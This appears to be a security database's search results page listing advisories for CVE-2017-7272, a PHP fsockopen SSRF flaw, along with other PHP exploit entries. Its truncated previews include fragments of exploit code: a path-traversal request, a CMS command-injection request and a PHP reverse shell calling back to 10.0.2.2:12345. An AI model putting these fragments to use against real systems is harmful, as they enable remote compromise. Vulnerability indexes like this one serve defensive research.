Lucene search
K

209 matches found

Packet Storm
Packet Storm
added 2017/04/03 12:0 a.m.248 views

PHP 7.1.2 fsockopen Misbehavior

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Misbehavior of the "fsockopen" function product: PHP vulnerable version: 7.1.2 fixed version: CVE number: CVE-2017-7272 impact: Medium homepage: http://www.php.net/ found...

5.8CVSS0.03514EPSS
Exploits2
RedhatCVE
RedhatCVE
added 2017/03/31 9:48 a.m.55 views

CVE-2017-7272

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead ...

7.4CVSS1.1AI score0.03514EPSS
Exploits2References1
Prion
Prion
added 2017/03/27 5:59 p.m.39 views

Design/Logic Flaw

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead ...

5.8CVSS7.4AI score0.03514EPSS
Exploits2References7Affected Software1
NVD
NVD
added 2017/03/27 5:59 p.m.28 views

CVE-2017-7272

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead ...

7.4CVSS7.5AI score0.03514EPSS
Exploits2References7
OSV
OSV
added 2017/03/27 5:59 p.m.40 views

CVE-2017-7272

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead ...

7.4CVSS6.7AI score
Exploits0References7
UbuntuCve
UbuntuCve
added 2017/03/27 5:59 p.m.50 views

CVE-2017-7272

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead ...

7.4CVSS7.1AI score0.03514EPSS
Exploits2References1
CVE
CVE
added 2017/03/27 5:0 p.m.313 views

CVE-2017-7272

CVE-2017-7272 : PHP up to versions 7.1.11 is vulnerable to SSRF when apps accept an fsockopen/pfsockopen hostname with a constrained port. The issue arises because a trailing ":port" in the hostname is parsed as the port, causing fsockopen to use the port from the hostname instead of the second a...

7.4CVSS7.4AI score0.03514EPSS
Exploits2References7Affected Software1
Cvelist
Cvelist
added 2017/03/27 5:0 p.m.41 views

CVE-2017-7272

PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead ...

7.5AI score0.03514EPSS
Exploits2References7
Debian CVE
Debian CVE
added 2017/03/27 5:0 p.m.59 views

CVE-2017-7272

Removed by vendor...

7.4CVSS7.6AI score0.03514EPSS
Exploits2
exploitpack
exploitpack
added 2016/08/22 12:0 a.m.25 views

VideoIQ Camera - Local File Disclosure

VideoIQ Camera - Local File Disclosure "cli" die$error0; if$argc "; echo"\nExample: php $argv0 localhost 8080"; die; ifisset$argv1 && isset$argv2 $host = $argv1; $port = $argv2; $pack = "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..FILEPATH HTTP/1.0\r\n"; $pack.= "Host:...

0.2AI score
Exploits0
seebug.org
seebug.org
added 2016/08/09 12:0 a.m.50 views

VBULLETIN 5.2.0/5.2.1/5.2.2 MEDIA UPLOAD SSRF PRIVILEGE ESCALATION

Author: c1tas, p0wd3r know Chong Yu 404 security lab CVE: CVE-2016-6483 A vulnerability overview vBulletin accepts the url parameters, it is not prohibited to jump transduction induced SSRF vBulletin need this function to access external connections, but this limit is not strict cause can trigger...

5CVSS8.4AI score0.11945EPSS
Exploits6
exploitpack
exploitpack
added 2015/08/17 12:0 a.m.13 views

Nuts CMS - PHP Remote Code Injection Execution

Nuts CMS - PHP Remote Code Injection Execution "cli" die$error0; if$argc "; echo"\nExample: php $argv0 localhost /"; die; ifisset$argv1 && isset$argv2 $host = $argv1; $path = $argv2; $pack = "GET $pathnuts/login.php?r= HTTP/1.0\r\n"; $pack.= "Host: $host\r\n"; $pack.= "Cmd: %s\r\n"; $pack.=...

0.2AI score
Exploits0
myhack58
myhack58
added 2015/04/16 12:0 a.m.93 views

IIS the latest high-risk Vulnerability, CVE-2 0 1 5-1 6 3 5, AND MS15-0 3 4. THE POC and online detection of source-vulnerability warning-the black bar safety net

! HTTP. sys remote code execution vulnerability, CVE-2 0 1 5-1 6 3 5, AND MS15-0 3 4. the A remote code execution vulnerability exists in the HTTP Protocol stack HTTP.sys, when the HTTP.sys not correct parsing specially crafted HTTP request to cause this vulnerability. Successful exploitation of...

10CVSS0.3AI score0.99999EPSS
Exploits16
rdot
rdot
added 2015/04/08 12:0 a.m.819 views

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

1.7AI score
Exploits0
securityvulns
securityvulns
added 2015/03/23 12:0 a.m.44 views

Betster (PHP Betoffice) Authentication Bypass and SQL Injection

?php / ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / / / XXXXXX / / XXXXXX / / XXXXXX / ------' Exploit Title : Betster PHP Betoffice Authentication Bypass and SQ...

0.8AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.18 views

PHP-Nuke 7.x Block-Old_Articles.PHP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/22037/info PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.20 views

Community CMS <= 0.4 (/index.php id) Blind SQL Injection Exploit

No description provided by source. --+++==============================================================+++-- --+++====== Community CMS = 0.4 Blind SQL Injection Exploit ======+++-- --+++==============================================================+++-- ?php function query $user, $pos, $chr $query...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.19 views

CMS Mini <= 0.2.2 - Remote Command Execution Exploit

No description provided by source. --+++================================================================+++-- --+++====== CMS Mini = 0.2.2 Remote Command Execution Exploit ======+++-- --+++================================================================+++-- ?php function usage exit \nCMS Mini =...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.38 views

Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working)

No description provided by source. ?php / = 1.3.1 Final /str0ke / $server = SERVER; $port = 80; $file = PATH; $target = 81; / User id and password used to fake-logon are not important. '10' is a random number. / $id = 10; $pass = ; $hex = 0123456789abcdef; for$i = 1; $i = 32; $i++ $idx = 0; $foun...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.12 views

PhpCommander <= 3.0 (upload) Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? $devilteam = ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+:...

7.1AI score
Exploits0
Rows per page
Query Builder